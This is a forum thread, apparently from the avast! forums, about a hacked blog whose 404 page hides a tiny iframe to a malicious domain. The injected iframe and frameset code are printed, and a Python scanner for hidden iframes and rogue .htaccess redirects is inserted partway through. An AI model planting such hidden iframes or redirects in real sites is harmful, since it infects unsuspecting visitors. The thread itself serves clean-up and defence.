Is avast faulty here?

My blog developed a problem and I deleted it. However, I lost connection and part of the blog was left up. After a while I found out someone had hacked in with iframe:inf. I completely removed the folder on my website, deleted the DB and all users connected to it. Basically it is gone.
I use IE8 and have completely cleaned out my cache.
Yet when I go to the blog I get a virus warning, on another pc I get 404 not found???

What should I check for this error message…as it definitely isn’t the site.

You should’ve been using Opera browser, it’s the most secure browser.

The only browser worse than IE is Firefox.

Oh no! Firefox fanboys will gang up on me. ::slight_smile:

Firefox fanboys are as bad as Comodo fanboys! :frowning: Maybe worse! :frowning:

And exactly what does the browser you use have to do with a site having been hacked? Answer: nothing.

If you think what you post will provoke a flame war then don’t post it, especially when it isn’t relevant to the problem.

@ DaveBenn

  • This is commonly down to old content management software being vulnerable (PHP, Joomla, WordPress, SQL, etc.); see this example of a host's response to a hacked site.
We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains. We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.

I suggest the following clean up procedure for both your accounts:

  1. Check all index pages for any signs of JavaScript injected into their coding. On Windows servers check any “default.aspx” or “default.cfm” pages as those are popular targets too.

  2. Remove any “rogue” files or php scripts uploaded by the hackers into your account. Such scripts allowed them to make account wide changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.

  3. Check all .htaccess files, as hackers like to load re-directs into them.

  4. Change all passwords for that end user account. The cp password, the ftp password, and any ftp sub accounts. Make sure to use a “strong” password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!

This, coupled with our server side changes, should prevent any resurfacing of the hackers' efforts. In some cases you may still have coding which allows for injection. All user input fields, hidden or not, should be hard coded, filtered, and sanitized before being handed off to PHP or a database, which will prevent coding characters from being submitted and run through your software.

Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.

What is the URL of the blog ?
When you post it, ‘modify’ the URL from http to hXXp or www to wXw, to break the link and avoid accidental exposure to suspect sites, thanks.

David

trueparenting dot co.uk/Blog uppercase B

Other pc in my house gets a 404. If you get a warning, then maybe it is an actual server error and not a problem on my machine as you have Avast and my other pc doesn’t.

Back when avast! forums was infected with an iframe, Opera was displaying a slightly larger font in avast! forums. I didn’t know what was wrong so I didn’t log in. If I remember right, someone did log in to avast! forums and it was a disaster for them. I’m glad Opera displayed the larger font; the larger font wasn’t intentional by Opera, just a reaction to the infection.

Did you notice anything suspicious before you logged in to your blog?

Hello DaveBenn,

According to this, there is an external reference on your site to this site: squidoo.com, and Google Safe Browsing says there is a malicious script on that site.

Try removing it temporarily and check with avast again.

nmb

All references to squidoo now gone…no difference to the message.
PS. I get the same virus warning in Mozilla Firefox.

I guess it’s too late now, but if you do start a new blog here is a good idea from Bob: http://forum.avast.com/index.php?topic=19387.msg483281#msg483281

Can you post a picture of the alert, please?

Got it! I was checking the main site and not the blog.

There is an iframe (hxxp://ncenterpanel.cn/) on your blog, not on the root page. Remove it.

That should do.

nmb

Thanks for spotting that, but WHERE is it? The entire folder is deleted from the server, the DB is deleted and no users left. So where is that iframe to be deleted from?

Here is the HTML page I get on my software which I use to get the source of the site:

I have just copied and pasted the source directly from the software, so you might see some white spaces.

And avast! might trigger on this page too, since it contains an iframe link.

<iframe src="hxxp://ncenterpanel.cn/" width="3" height="2"></iframe>













<html>
<head>
<title>Something of interest...</title>
</head>
<frameset rows=*>
<frame src="http://multinetti.lisasim737.hop.clickbank.net">
</frameset>
</html>
<!-- 
                                                                                                                                                                                                                                                                                                                                                                                                                                          
--> 

Superb!! Fixed it. Some low crawling scumbag has hacked my website and obviously left one of those in the standard 404 page. They also screwed all the index pages which I am working through now.

Thanks again…very helpful.

You are welcome to the forums.

But, please consider this post from Sir DavidR. It will help you avoid getting infected again. Also the stopbadware link.

nmb

No alert in Firefox 3.6.2, so presumably this post was before clearing out the critter. I just get the standard HTTP 404 error and not any custom 404 page, which is regularly hacked also.

It is always better to use an image when pointing out code, even if you have edited the http, as the whole page is scanned in text mode by the web shield (the network shield may also be hunting out domain names in its list) and it could well alert on inserted samples, see image.

So, what is this software that lifts the source code? I have JS:Illredir-AK splattered all over my server, so would like to see if I can find it without having to check every single page.
I have one major problem with a site that is 95% PHP so will take decades to check every file.
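The host's clean-up steps quoted earlier (check index/404 pages for injected code, check .htaccess for redirects) and the question above about finding injections without opening every file, as an added example that is not from the thread or any tool named in it: a small Python scanner that flags tiny or hidden iframes, the blank-line and whitespace-comment padding seen in the 404 page above, and off-site redirect directives in .htaccess. The sample page, the sample .htaccess and the domain names in them are constructed for the example; run the functions over each file from an os.walk of the web root.

```python
import re

# Constructed samples (not from the thread): a tampered 404 page that hides a tiny iframe
# behind a run of blank lines and a whitespace-stuffed comment, plus a tampered .htaccess.
SAMPLE_404 = (
    '<iframe src="http://malicious.example/" width="3" height="2"></iframe>\n'
    + "\n" * 12
    + "<html><head><title>Something of interest...</title></head>\n"
    + '<frameset rows=*><frame src="http://affiliate.example/"></frameset></html>\n'
    + "<!-- " + " " * 300 + " -->\n"
)
SAMPLE_HTACCESS = (
    "RewriteEngine On\n"
    "RewriteCond %{HTTP_REFERER} google|yahoo|bing [NC]\n"
    "RewriteRule ^(.*)$ http://redirect.malicious.example/in.cgi?3 [R=301,L]\n"
    "ErrorDocument 404 /404.html\n"
)

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*["']?([^"'\s>]+)""")
BLANK_RUN_RE = re.compile(r"(?:\r?\n[ \t]*){10,}")          # 10+ consecutive blank lines
PADDED_COMMENT_RE = re.compile(r"<!--\s{100,}-->")           # comment that is only whitespace
HTACCESS_RE = re.compile(r"^\s*(RewriteRule|Redirect(?:Match)?|ErrorDocument)\s+(.*)$",
                         re.IGNORECASE | re.MULTILINE)

def scan_html(text, max_px=5):
    """Return (kind, detail) findings for hidden iframes and padding tricks."""
    findings = []
    for tag in IFRAME_RE.findall(text):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
        w, h = attrs.get("width", ""), attrs.get("height", "")
        tiny = w.isdigit() and h.isdigit() and int(w) <= max_px and int(h) <= max_px
        hidden = "display:none" in tag.replace(" ", "").lower()
        if tiny or hidden:
            findings.append(("hidden-iframe", attrs.get("src", "?")))
    if BLANK_RUN_RE.search(text):
        findings.append(("whitespace-padding", "10+ blank lines"))
    if PADDED_COMMENT_RE.search(text):
        findings.append(("whitespace-padding", "whitespace-only comment"))
    return findings

def scan_htaccess(text, own_hosts):
    """Flag redirect/rewrite/error-page directives that point to a host not in own_hosts."""
    findings = []
    for directive, rest in HTACCESS_RE.findall(text):
        for host in re.findall(r"https?://([^/\s]+)", rest):
            if host.lower() not in own_hosts:
                findings.append((directive, host))
    return findings
```

Hits are leads, not verdicts: a legitimate tracking iframe can be tiny too, so compare each flagged file against a known-good copy or backup before deleting.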

Thanks for the suggestion sir DavidR. I will surely do that next time. You had once, previously, warned me regarding this. Will surely take care of it next time.

@ DaveBenn

Well, the software which I use can't help much in cleaning up stuff on your site. I guess there are others. I will ask one of my forum friends to help you in this regard. So kindly wait.

Thanks
nmb

Hi murali & DaveBenn,

The main culprit to look for is described fully here: http://www.whitefirdesign.com/resources/port-8080-malware.html

There is this script there and this has/had a suspicious history:
hxtp://s9.addthis.com/js/widget.php?v=10
Last time suspicious behavior was found there was on 2010-03-06.

This site was hosted on 23 network(s) including AS20940 (AKAMAI), AS1299 (TELIANET), AS7843 (ADELPHIA). Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 4 domains, including recipeeworld.com/, mapsofworld.com/, mensherbalpills.com/. Comments for these sites: "People, you should go on that site, they want people to see it and then catch a virus", that is clear as it is, isn't it?

polonus